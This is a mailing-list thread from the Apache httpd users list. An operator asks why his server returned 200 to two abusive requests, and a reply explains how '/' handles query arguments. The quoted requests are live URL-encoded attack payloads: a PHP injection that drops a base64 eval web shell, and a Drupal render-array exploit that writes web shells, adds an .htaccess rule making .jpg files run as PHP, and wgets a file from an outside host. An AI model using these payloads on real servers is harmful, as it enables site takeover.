Re: Strange responses

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



The requests processed asked to GET and POST to / in HTTP/1.1 protocol.

Why do you suppose your server should reject a request for the content '/'? Seems like a very strange concern.

Depending on the handler charged with processing '/', the remaining '?' query args are interpreted, or generally ignored.


On Fri, Apr 5, 2019, 23:15 kohmoto <kohmoto@xxxxxxxxxxxxxxxx> wrote:
Hi,

I operate my site with httpd 2.4.39 with ssl option.

Yesterday, strange responses were observed.

My site received the following abuse requests.  Except the following
requests, the httpd return 404 error to obvious abuse requets. However,
as to the following two queries, the httpd seemed to return a message
when it receives 'GET /' with 200 status.  I  expect the httpd should
return 404 error.

Case 1:
GET
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1

Case 2:
POST
/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27
HTTP/1.1

It would be very appriciated if someone could advise me.

Thank you.

Yours truly,

Kazuhiko Kohmoto



---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx


[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux